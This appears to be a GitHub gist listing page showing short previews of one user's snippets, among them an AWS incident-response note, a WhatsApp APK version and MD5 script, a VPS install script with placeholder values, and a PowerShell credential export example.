@am1ru1
am1ru1 / IR_AWS_ATHENA.md
Created December 25, 2022 19:10
Incident Response AWS Athena

EC2 security group modifications

When reviewing an operational issue or security incident for an EC2 instance, the ability to see any associated security group change is a vital part of the analysis.

For example, if an EC2 instance triggers a CloudWatch metric alarm for high CPU utilization, we can first look to see if there have been any security group changes (the addition of new security groups or the addition of ingress rules to an existing security group) that potentially create more traffic or load on the instance. To start the investigation, we need to look in the EC2 console for the network interface ID and security groups of the impacted EC2 instance. Here is an example:

Network interface ID = eni-6c5ca5a8

Security group(s) = sg-5887f224, sg-e214609e

# Word Find.Execute parameters for hunting a string in a document
$FindText = "hunttext" # <= Find this text
$MatchCase = $false
$MatchWholeWord = $true   # original read $MatchWholeWorld; the Find parameter is MatchWholeWord
$MatchWildcards = $false
$MatchSoundsLike = $false
$MatchAllWordForms = $false
$Forward = $false
@am1ru1
am1ru1 / vscode_shortcuts.md
Created February 24, 2021 16:01 — forked from bradtraversy/vscode_shortcuts.md
Helpful shortcuts for VSCode

VSCode Shortcuts

List of helpful shortcuts for faster coding

If you have any other helpful shortcuts, feel free to add in the comments of this gist :)

Official List of all commands

@am1ru1
am1ru1 / Python3File.py
Created October 24, 2020 18:08 — forked from Abizern/Python3File.py
Skeleton Python3 file template
#!/usr/bin/env python3
# Note: the original shebang passed "-tt"; env on Linux does not split
# interpreter arguments, so the flag is dropped here to keep the file runnable.
"""
Module documentation.
"""
# Imports
import sys
#import os
# Global variables
@am1ru1
am1ru1 / dexMD5.py
Created October 12, 2019 15:54 — forked from masbog/dexMD5.py
get dex MD5 of WhatsApp Application and get WhatsApp Version from an APK file
#!/usr/bin/env python3
# tweaked from https://github.com/mgp25/classesMD5-64/blob/master/dexMD5.py
# builds on the AXML library from https://github.com/mikusjelly/axmlparser
# adds XML manifest parsing to obtain the WhatsApp version
# usage: $ python3 dexMD5.py apk/WhatsApp.apk
# Output :
# WhatsApp Version : 2.17.296
# WhatsApp ClassesDEX MD5 : b'YrJNPljM3TuNFPIOZ+jziw=='
#
# @MasBog

Keybase proof

I hereby claim:

  • I am am1ru1 on github.
  • I am am1ru1 (https://keybase.io/am1ru1) on keybase.
  • I have a public key ASC8kZvfU36mpW7wtIIisFE0POLhq85lecaSnjBTrgGWOgo

To claim this, I am signing this object:

@am1ru1
am1ru1 / install.sh
Created May 1, 2018 08:44
VPS install bash script for Ubuntu 16.04
# =================== YOUR DATA ========================
# Placeholder values; replace before running. Do not commit real passwords to a gist.
SERVER_NAME="some-server-name"
SERVER_IP="111.111.11.11"
USER="someuser"
SUDO_PASSWORD="secret-password-one"
MYSQL_ROOT_PASSWORD="secret-password-two"
@am1ru1
am1ru1 / Credential.ps1
Created September 7, 2016 07:50 — forked from nightroman/Credential.ps1
Get, export, and import credential
# credential file path
$CredentialPath = "$PSScriptRoot\credential.clixml"
# get and export credential
# Export-Clixml protects the password with DPAPI, so the file can only be
# imported by the same user on the same machine that exported it.
$credential = Get-Credential
$credential | Export-Clixml -LiteralPath $CredentialPath
# import credential
$credential = Import-Clixml -LiteralPath $CredentialPath
$credential